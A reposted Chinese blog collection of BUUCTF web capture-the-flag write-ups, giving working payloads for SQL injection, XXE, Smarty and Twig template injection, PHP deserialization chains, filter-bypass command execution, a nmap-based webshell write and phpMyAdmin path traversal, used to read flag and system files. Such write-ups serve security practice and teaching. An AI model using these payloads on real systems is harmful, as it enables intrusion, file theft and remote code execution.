BUUCTF-WEB-刷题记录(2)

[网鼎杯 2018]Fakebook

注册一个账户,进去之后查看源代码,感觉存在注入点
image.png
是数字型注入,payload:

1%20and(false)
1%20and(true)

image.png
image.png
判断列数

1 order by 5

image.png
改为4的时候则页面正常
image.png
判断显示位,可以看见第二列存在数据回显

0 union/**/select 1,2,3,4

image.png
查看可执行的权限路径:

0%20union/**/select%201,@@global.secure_file_priv,3,4

当返回空值,意味着可以读取或者写入任意路径的文件
image.png
使用load_file函数读取flag文件

0%20union/**/select%201,load_file("/var/www/html/flag.php"),3,4

查看源码,获得flag
image.png

[RoarCTF 2019]Easy Java

访问链接地址,可以发现是一个登录框页面
image.png
感觉怪怪的,先看一眼源码,就发现突破点了
image.png
访问可以发现出现报错
image.png
更改数据包,把GET请求方式改为POST,发现成功下载help.docx
image.png
打开help.docx文档,可以发现提示,说明我们还需要下载关键的文件才行。
image.png
因为根据题目提示JAVA,使用尝试利用下载WEB-INF/web.xml文件,可以看见成功了
image.png

java网站的目录结构

src: 存放项目的Java源代码。src/com/example/web/:Java源代码的根目录,可能按照包构组织。webapp(或者WebContent): 包含Web应用程序的资源文件。
webapp/WEB-INF/:包含配置和部署描述文件。
webapp/WEB-INF/web.xml:Web应用的部署描述文件,包含Servlet和其他配置信息。
webapp/WEB-INF/classes/:编译后的Java类文件。
webapp/WEB-INF/lib/:存放项目依赖的JAR文件。
webapp/WEB-INF/jsp/:存放JSP文件。

根据回显,可以看见是要获取编译后的Java文件
image.png
所以构造payload:

/Download?filename=/WEB-INF/classes/com/wm/ctf/FlagControlle.class

image.png
可以发现flag就是这串 base64 编码
image.png

[BJDCTF2020]The mystery of ip

访问链接,直接进入主题。根据题目提示:说明ip存在猫腻
image.png
为数据包添加请求头:

X-Forwarded-For:127.0.0.1

image.png
可以看见X-Forwarded-For:是一个可控点,我们可以利用这个请求头来进行其他操作
image.png
最终测试出,存在SSTI模板注入。

{{8*8}}

通过FUZZ爆破发现是Smarty模板的SSTI漏洞,最后使用payload:

{{system("cat /flag")}}

image.png
可以看见成功获取flag

[网鼎杯 2020 朱雀组]phpweb

进入网页后,可以发现,有些奇怪的信息突然出现在页面中
image.png
抓包看看,可以发现是调用了php的函数才导致的
image.png
既然我们知道了可以调用函数来实现日期的回显,那么我们利用可控变量修改函数,来读取index.php来看看

func=file_get_contents&p=index.php

image.png
通过读取源码,发现禁用了许多可以执行命令的函数。

   <?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {return $result;} else {return "";}}class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {$func = strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die("Hacker...");}}?>

但是我们可以看见下面的类:

   class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];

其他代码不用管,因为影响不大。如果要想绕过禁用函数,那么就要执行反序列,为什么呢?因为反序列化 unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。
从而构造payload:

<?phpclass Test {var $p = "Y-m-d h:i:s a";var $func = "date";}$a = new Test();$a -> func ="system";//$a -> p = "find / -name 'flag*'";$a -> p ="cat /tmp/flagoefiu4r93";echo serialize($a);
?>

查找flag路径

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag*'";s:4:"func";s:6:"system";}

image.png
获取flag

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}:6:"system";}

image.png

[BSidesCF 2020]Had a bad day

进入网页之后,可以看见有两个按钮可以点击
image.png
通过观察可以发现,浏览器多了个参数进行请求,每次刷新页面猫猫的图片都会换掉
image.png
因此推测不是sql注入的漏洞,应该是文件包含漏洞,使用php伪协议可以发现成功读取文件

php://filter/convert.base64-encode/resource=index

image.png
因为报错信息可以发现php是有两个的,那么我们删掉.php就好了。
image.png
base64解码得到index.php源码

<?php$file = $_GET['category'];
if(isset($file))
{if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){include ($file . '.php');}else{echo "Sorry, we currently only support woofers and meowers.";}
}
?>

通过代码审计,可以看见要想包含想要的文件,就必须通过if判断。那么我们要包含的flag文件在哪里呢?
通过目录扫描得知是flag.php 文件
从而构造payload:

?category=meowers/../flag

可以发现验证成功
image.png
最后利用php伪协议就可以成功读取到了flag.php 的源代码

?category=php://filter/convert.base64-encode/resource=meowers/../flag

image.png
base64解码获得flag
image.png

[BUUCTF 2018]Online Tool

进入页面后开始审计源码:

<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}if(!isset($_GET['host'])) {highlight_file(__FILE__);
} else {$host = $_GET['host'];$host = escapeshellarg($host);$host = escapeshellcmd($host);$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);echo 'you are in sandbox '.$sandbox;@mkdir($sandbox);chdir($sandbox);echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

通过观察可以发现最重要的函数就是

escapeshellarg
escapeshellcmd

绕过原理:

<?phpecho "一开始的字符串:".$a= "'hell";
echo "<br>是escapeshellarg函数:".$b = escapeshellarg($a);
echo "<br>是escapeshellcmd函数:".escapeshellcmd($a);
echo "<br>两个函数一起的结果:".escapeshellcmd($b);

为开头 hell 的首位添加一个单引号,通过观察可以发现最终两个函数的结果的单引号没有闭合导致不能执行恶意代码。
image.png
通过观察可以发现是单引号引起了转义,当 'hell 后面再次添加一个单引号的时候就会闭合
image.png
知道了闭合单引号,也意味着我们可以控制变量参数了。

//?$host=payload
//?host='执行的关键payload '
//末尾的单引号前面还要多空出一格

由于nmap的 -oG 参数可以导出文件,利用这点构造以下payload:

?host='<?php echo `cat /flag`;?> -oG a.php '

image.png
最后访问生成的php文件获得flag

xxx.buooj.cn:81/73d2515c6cc128eff4ed44689ccbe7e6/a.php

image.png

[BJDCTF2020]ZJCTF,不过如此

进入页面先审计源码:

<?phperror_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";if(preg_match("/flag/",$file)){die("Not now!");}include($file);  //next.php}
else{highlight_file(__FILE__);
}
?>

主要看第六行代码,当 t e x t 变量等于 I h a v e a d r e a m ,同时 f i l e g e t c o n t e n t s 函数将会读取 text 变量等于 I have a dream ,同时file_get_contents函数将会读取 text变量等于Ihaveadream,同时filegetcontents函数将会读取text 变量,它们两个进行对比是否等于 I have a dream。我们只需要让text变量等于这个英文字符串即可。
我这里使用data协议,当然也可以php://input 协议,构造以下payload:

?text=data://text/plain,I have a dream

可以看见我们的页面并没有报错,已经成功的运行到了file_get_contents 函数,这也意味着我们也可以控制下面的file变量
image.png
然后php伪协议读取 next.php 提示文件的源码:

?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

image.png
最后base64 解码获取源码:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;function complex($re, $str) {return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}foreach($_GET as $re => $str) {echo complex($re, $str). "\n";
}function getFlag(){@eval($_GET['cmd']);
}

这里主要考点是 preg_replace 的一个RCE漏洞:

preg_replace( '/(' . $re . ')/ei','strtolower("\\1")', $str);

主要是构造:

preg_replace('.*')/ei','strtolower("\\1")', {${此处填函数名}});

所以我们要做的就是换一个正则表达式,让其匹配到 {${phpinfo()}} 即可执行 phpinfo 函数。
payload:

?\S*=${phpinfo()}

image.png
根据此原理的条件下,我们剩下想要执行命令就简单的多了,使用源码自带的函数获取flag。通过调用getFlag()函数,然后执行命令:
image.png

?\S*=${getFlag()}&cmd=system('cat /flag');

image.png

这个是我自己想的getshell思路,感觉这个更方便点。也可以使用系统自带的命令执行

?\S*=${system($_GET[c])}&c=cat /flag

image.png

花式绕过:

?\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}

image.png
关于preg_replace漏洞的产生,可以参考这篇:

https://xz.aliyun.com/t/2557

[GXYCTF2019]禁止套娃

信息收集

首先进入页面,通过页面的信息和抓包发现没有任何可以利用的东西,猜测可能是需要目录扫描
image.png
果不其然,成功扫出来了 是git泄露
使用工具GitHack:

https://github.com/lijiejie/GitHack

image.png
可以看见已经获得了一个index.php 的源码文件:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");}}else{die("再好好想想!");}}else{die("还想读flag,臭弟弟!");}
}
// highlight_file(__FILE__);
?>

代码审计

现在最重要的代码审计,如何获得eval可控变量?进行shellcode 注入
image.png
我们主要看这三行代码:

   if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
  • 第一行意思是:不能匹配恶意的协议流,如果没有匹配进入到下一个if判断语句
  • 第二行意思是:将匹配到的字符串,如果替换为NULL(空)之后仍然等于 ";"这个分号,就可以进行下一个if判断中。
    • 在这其中我们需要注意替换符:
'/[a-z,_]+\((?R)?\)/'
// 这个可能很难理解,但其实不是的。
// 例如 a-z的引文字符母和下划线 _ 最后通过连接符号 + 上括号 () 
// ?R 里面的意思递归。至于递归什么,递归的是刚刚说的那些,例如a(b(c()))
// a()里面包含着b(),以此类推就是这个意思
  • 而第三行的意思是:不能匹配里面的关键字,大小写也绕过不了。如果没有里面的关键词,就会可以执行 eval这个可控变量了。

构造payload

array数组

现在我们了解那么多,就可以开始自己造轮子来代替平时的函数以达到我们的目的:只能通过函数,而不再函数里面使用双引号与字符串。
查看当前路径下的文件,以数组方式打印:

?exp=print_r(scandir(pos(localeconv())));// scandir — 列出指定路径中的文件和目录
// pos是current函数的别名,current用来返回当前数组的当前单元
// localeconv — 获取数字格式信息,在这里它的作用可以代替路径 ./

image.png
发现flag.php 在倒数第二行。
在php函数中刚好可以利用 next函数与 array_reverse函数进行利用,最后通过show_source 高亮显示文件成功读取到flag.php:

?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));// next — 将数组中的内部指针向前移动一位
// array_reverse — 返回单元顺序相反的数组

image.png
当 flag.php 的数组位置随机,可以使用 array_rand函数与array_flip函数,以下payload,一直刷新页面flag就会回显:

?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));

image.png

array_rand()返回的是数组名称,而array_flip()函数的作用是通过数组名称来获得数组值
这两个函数互相搭配,就可以通过数组名称来获得到数组的值了
session_id()

这种RCE的方式,主要是通过 session 来帮助命令执行的。
image.png
因为我们可以通过这些函数来控制可控变量,而session_id 的作用就是获取当前会话的ID,也就是cookie中的phpsession,我们可以通过抓包修改其值,从而注入shellcode。

因为 phpsession 只允许 a-z A-Z 0-9 "。" "-" 所以我们必须转换为十六进制,才能RCE。
而session_id必须要开启session才可以使用,所以我们要使用session_start()函数。

RCE的payload:

?exp=eval(hex2bin(session_id(session_start())));

image.png
image.png
执行不了,是因为第二行的代码,它不支持数字:

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {

不过不影响获得flag:

?exp=show_source(session_id(session_start()));// Cookie:PHPSESSID=flag.php

image.png
其他的无参数rce,具体可以看看这篇:

https://blog.csdn.net/weixin_46330722/article/details/110840156

[NCTF2019]Fake XML cookbook

根据题目提示可以看见是关于XML,想起XML语言标记文本就会联想到XXE漏洞,具体可以参考我之前写过的一篇文章,这里就不再赘述基础知识了。

https://blog.csdn.net/weixin_53912233/article/details/129077736

首先打开burp suite进行抓包,可以发现是XML语言
image.png
尝试一下payload:

<!DOCTYPE cike[<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>&xxe;</username><password>a</password></user>

发现直接给出了回显,证实了存在漏洞的利用性
image.png
剩下的就是读取flag文件就成功了,根据数据的flag.php提示
image.png
最终试出来了flag的具体位置,下面是payload:

<!DOCTYPE cike[<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>&xxe;</username><password>a</password></user>

[GWCTF 2019]我有一个数据库

通过目录扫描发现一个phpmyadmin的后台地址
image.png
然后搜索历史漏洞,可以发现poc:

?target=db_sql.php%253f/../../../../../../../../etc/passwd

image.png
获取flag:

?target=db_sql.php%253f/../../../../../../../../flag

image.png

[BJDCTF2020]Mark loves cat

通过目录扫描发现存在 .git 泄露
image.png
然后使用工具GitHack 获得了源码,index.php 源码:

<?phpinclude 'flag.php';$yds = "dog";
$is = "cat";
$handsome = 'yds';foreach($_POST as $x => $y){$$x = $y;
}foreach($_GET as $x => $y){  $$x = $$y;
}foreach($_GET as $x => $y){     if($_GET['flag'] === $x && $x !== 'flag'){exit($handsome);}
}if(!isset($_GET['flag']) && !isset($_POST['flag'])){exit($yds);
}if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){exit($is);
}echo "the flag is: ".$flag;

flag.php 的源码:

<?php$flag = file_get_contents('/flag');

可以看见要想输出echo函数,就要绕过三个if判断,但是陷入不太可能。
而突破点就是exit()函数,当调用此函数的时候,里面的变量将会执行。
所以我们只需要想办法进行变量覆盖执行这一段,让$yds变量等于flag:

if(!isset($_GET['flag']) && !isset($_POST['flag'])){exit($yds);
}

其中foreach语句的意思是:

foreach($_GET as $x => $y){  // $x 表示每个传递过来的参数名,而 $y 则表示对应参数名的值。
$$x = $$y;}
	所以我们输入的变量是 yds = flag ,$x=yds $y=flag,$$x = $$y 所以 $yds=$flag所以当 $yds = $flag 时,就会调用exit($yds); 等同于 echo $flag;因为头部包含了flag.php

从而构造payload:

?yds=flag

image.png
而且一开始主页就有提示了,一个dog回显
image.png
查看源代码,可以看见dog是 $yds的变量
image.png
所以当我们替换dog为flag就会输出flag

第二个payload构造,可以看见我们需要触发is变量,前提条件是满足flag=flag或者使用post请求:

foreach($_GET as $x => $y){$$x = $$y;
}if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){exit($is);
}

所以我们构造payload:

?is=flag&flag=flag

image.png
至于is为什么要等于flag,原理也是和 yds 变量一样,它们都是通过 foreach语句。变成可可变量了。而三个if所执行的exit()函数里面的变量都是不同的。
第三个payload:

?handsome=flag&flag=x&x=1
// 这里不一定是 x变量也可以改
?handsome=flag&flag=a&a=1

原理是为了绕过第一个if判断,所以 f l a g = flag= flag=x变量里的值,而x不能等于flag,所以在需要一个$x传入变量

foreach($_GET as $x => $y){$$x = $$y;
}foreach($_GET as $x => $y){    if($_GET['flag'] === $x && $x !== 'flag'){ // x变量不能等于flag,且flag变量要等于x变量,所以可以通过if判断。exit($handsome);}

image.png
payload4:
还有一个解法,我觉得应该算是php弱数组:
image.png
因为foreach,输出的都是数组,那么我们不仅可以利用变量覆盖,还可以利用php的数组的特性如:

?13=flag&flag=13

image.png

[WUSTCTF2020]朴实无华

通过信息收集发现存在robots.txt 文件
image.png
访问这个php,回显了一个flag不在这?
image.png
抓包发现,返回包头存在提示
/fl4g.php
image.png
然后又是一个php审计:
image.png

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);//level 1
if (isset($_GET['num'])){$num = $_GET['num'];if(intval($num) < 2020 && intval($num + 1) > 2021){echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";}else{die("金钱解决不了穷人的本质问题");}
}else{die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){$md5=$_GET['md5'];if ($md5==md5($md5))echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";elsedie("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{die("去非洲吧");
}//get flag
if (isset($_GET['get_flag'])){$get_flag = $_GET['get_flag'];if(!strstr($get_flag," ")){$get_flag = str_ireplace("cat", "wctf2020", $get_flag);echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";system($get_flag);}else{die("快到非洲了");}
}else{die("去非洲吧");
}
?>
去非洲吧

level 1绕过 intval:

if (isset($_GET['num'])){$num = $_GET['num'];if(intval($num) < 2020 && intval($num + 1) > 2021){echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";}else{die("金钱解决不了穷人的本质问题");}
}else{die("去非洲吧");
}

绕过条件是满足num变量小于2020,当+1时要大于2021,这里有一个函数 intval,当数字存在字母e时进行计算会变成科学计算法,因为这里的比较是弱类型比较,所以可以使用字母:

其中 e 表示乘以 10 的幂。所以 202e9 实际上表示的是 202 乘以 10 的 9 次方,也就是 202 亿。

所以成功绕过了这个if判断,payload:

?num=202e9

image.png
level 2

if (isset($_GET['md5'])){$md5=$_GET['md5'];if ($md5==md5($md5))echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";elsedie("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{die("去非洲吧");
}

可以看见是md5的弱类型比较,==在比较数据的时候会进行类型的转换,我们只需要找到对应的数值就好了:

?num=20e09&md5=0e807097110

image.png
level3:

if (isset($_GET['get_flag'])){$get_flag = $_GET['get_flag'];if(!strstr($get_flag," ")){$get_flag = str_ireplace("cat", "wctf2020", $get_flag);echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";system($get_flag);}else{die("快到非洲了");}
}else{die("去非洲吧");
}
?>

可以看见传入get_flag 变量之后,strstr 函数检查该值是否包含空格。如果没有空格,它将使用 str_ireplace 函数将字符串中的 “cat” 替换为 “wctf2020”。
payload:

?num=20e09&md5=0e807097110&get_flag=ls // 查看当前目录
?num=20e09&md5=0e807097110&get_flag=ca\t${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
//  \ 等于空变量 ${IFS}等于空格

image.png

[BJDCTF2020]Cookie is so stable

进入网页,直接来到提示,点击FLAG
image.png
根据提示说cookie,我们抓包看看
image.png
image.png
发现cookie里面有个user参数等于a,再放包可以发现页面回显了个字母a
image.png
经过测试,推测出是SSTI模板注入的漏洞,payload:

{{8*8}}

image.png
回显出了64的数字
serverside.png
通过这幅图的payload测试,可以推测出可能是 Twig模板,或者Jinja2模板。
最终测试出是Twig 模板payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

image.png

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

image.png

[安洵杯 2019]easy_web

进入页面可以通过观察这是一个base64 的编码,可以发现是img参数接受的,感觉很奇怪。
image.png
因此推测出可能是来显示页面中的图片,通过解码发现:
base64 -> base64 -> hexe -> text
image.png
最后发现是源文件是555.png,按照这种思路尝试把555.png 改为 index.php 然后进行反向编码:
hex -> base64 -> base64

?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=

可以发现有base64编码后的字符串
image.png
base64解码得出源码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {echo '<img src ="./ctf3.jpeg">';die("xixi~ no flag");
} else {$txt = base64_encode(file_get_contents($file));echo "<img src='data:image/gif;base64," . $txt . "'></img>";echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {echo("forbid ~");echo "<br>";
} else {if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {echo `$cmd`;} else {echo ("md5 is funny ~");}
}?>

通过观察代码可以发现是RCE执行,才能获取flag,那么我们需要绕过这两段关键代码:

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {echo("forbid ~");echo "<br>";if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {echo `$cmd`;

其中最重要的post传参的a和b,因为它们是强类型比较MD5值相等,且转换为字符串类型的值不能相等。
因为传入的必须是字符串,就不能拿数组绕过了。
至于MD5碰撞相等的方法可以具体参考这一篇文章:

https://blog.csdn.net/shuaicenglou3032/article/details/118197904

现在进行构造数据包,可以发现成功执行命令
image.png

a=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C/%CA%B5%87%12F~%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25qAZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BD%F2%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E2%B4%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW~%E8%CET%B6p%80%A8%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%2Bo%F7%2Ap&b=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C/%CA%B5%07%12F~%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25%F1AZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BDr%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E24%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW~%E8%CET%B6p%80%28%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%ABo%F7%

由于是post请求,还需添加这个请求头,用于表示post请求编码的格式:

Content-Type:application/x-www-form-urlencoded

现在只需要绕过命令执行就可以

l\s
l\s%20/

查看根目录文件,反斜杠可以绕过空变量,%20用于绕过空格
image.png
最后读取flag

ca\t%20/flag

image.png

[MRCTF2020]Ezpop

访问页面可以是关于反序列化的题,如图
image.png
我们可以从第一个类开始分析:

class Modifier {// protected定义的变量反序列化之后,输出的字符串为不可显,需要urlencode进行编码输出protected  $var;//可以看见这里有一个include函数,可以进行文件包含漏洞,来进行读取flag.php文件public function append($value){include($value);}//调用include函数,必须使用__invoke()方法:当尝试以调用函数的方式调用一个对象时,_invoke()方法会自动调用函数public function __invoke(){$this->append($this->var);}
}

通过分析,我们必须要调用函数的方式调用一个对象,才能利用 include()函数来读取flag.php文件。

在最后一个类进行分析,发现存在调用__invoke()的方式:

class Test{public $p;public function __construct(){$this->p = array();}
//读取不可访问(protected 或 private)或不存在的属性的值时,__get() 会被调用。public function __get($key){$function = $this->p;return $function();}
}

可以看见第9行,return函数意味着调用函数。为了可以执行__get函数,我们需要读取和不可访问(protected 或 private)或不存在的属性的值。

现在分析中间的show类:

class Show{public $source;public $str;//这个不重要,只是输出xxx,决定不了什么public function __construct($file='index.php'){$this->source = $file;echo 'Welcome to '.$this->source."<br>";}//当输出引用这个类的时候,将会调用__toString(),就会返回这些属性值给全局进行使用public function __toString(){ return $this->str->source;}//在这里可以看见echo输出函数,后面调用__toString()将会用到这里的source属性。public function __wakeup(){if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {echo "hacker";$this->source = "index.php";}}
}

现在知道了 include()来自Modifie类---->Test()的__get()调用方法---->使用Show()__toString()来构造不存在的属性和值
开始构造pop链:

所以创建新类的顺序为:
Show()->Test()->Modifie()

php生成反序列化的脚本:

<?php
class Modifier {protected  $var = "php://filter/convert.base64-encode/resource=flag.php";
}class Show{public $source;public $str;
}class Test{public $p;
}// 初始化创建Show()的类为a变量 
$a = new Show();
// 将source属性添加到 Show()类中,因为这样子就可以使用到echo函数,也会调用__toString()方法
$a->source= new Show();  
// Test()类的__get()方法,为了可以调用,我们将属性调转过来
$a->source->str= new Test();
// 最后将全部的属性指定到p中,放入Modifier()类,才能执行__invoke()方法,即调用include()函数
$a->source->str->p = new Modifier();// 输出反序列化,以url编码,这是为了显示protected变量的不可回显的字符
echo urlencode(serialize($a));

最后生成payload:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

以pop参数接受payload
image.png
base64解码获得flag
image.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/190653.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

智能优化算法应用:基于乌燕鸥算法无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用&#xff1a;基于乌燕鸥算法无线传感器网络(WSN)覆盖优化 - 附代码 文章目录 智能优化算法应用&#xff1a;基于乌燕鸥算法无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.乌燕鸥算法4.实验参数设定5.算法结果6.参考文献7.…

基于STC12C5A60S2系列1T 8051单片机的液晶显示器LCD1602显示功能菜单应用

基于STC12C5A60S2系列1T 8051单片机的液晶显示器LCD1602显示功能菜单应用 STC12C5A60S2系列1T 8051单片机管脚图STC12C5A60S2系列1T 8051单片机I/O口各种不同工作模式及配置STC12C5A60S2系列1T 8051单片机I/O口各种不同工作模式介绍液晶显示器LCD1602简单介绍IIC通信简单介绍掉…

Lattice-Based Blind Signatures: Short, Efficient, and Round-Optimal

目录 摘要引言 Lattice-Based Blind Signatures: Short, Efficient, and Round-Optimal CCS 2023 摘要 我们提出了一种基于随机预言机启发式和标准格问题&#xff08;环/模块SIS/LWE和NTRU&#xff09;的2轮盲签名协议&#xff0c;签名大小为22KB。该协议是全面优化的&#xf…

企业网盘在医疗行业资料管理中的应用与优势

随着企业网盘的广泛应用&#xff0c;医疗行业正逐渐实现资料安全存储和智能化管理。海量应用的推动下&#xff0c;医院管理正朝着线上化、智能化发展迈进。然而&#xff0c;医疗行业仍面临着诸多挑战。 医疗行业的痛点在于病例、档案、药品资料繁多且保存周期长。这些资料的整理…

服务注册发现 配置中心 springcloud alibaba nacos

文章目录 0100 系统环境0200 nacos安装0201 下载0202 安装 0300 工程说明0301 结构说明0302 运行效果 0400 代码说明0401 服务提供者&#xff08;Provider Service&#xff09;0402 服务消费者&#xff08;Consumer Service&#xff09;服务提供者SDK&#xff08;Provider Serv…

Mapper文件夹在resource目录下但是网页报错找不到productMapper.xml文件的解决

报错如下&#xff1a; 我的Mapper文件夹在resourse目录下但是网页报错找不到productMapper.xml。 结构如下&#xff1a;代码如下&#xff1a;<mappers><mapper resource"com/dhu/mapper/productMapper.xml" /> </mappers> 这段代码是在mybatis-co…

5G承载网和大客户承载的演进

文章目录 移动4/5G承载网联通和电信4/5G承载网M-OTN&#xff08;Metro-optimized OTN&#xff09;&#xff0c;城域型光传送网PeOTN&#xff08;packet enhanced optical transport network&#xff09;&#xff0c;分组增强型OTN板卡增强型PeOTN集中交叉型PeOTN VC-OTN&#x…

Hdoop学习笔记(HDP)-Part.11 安装Kerberos

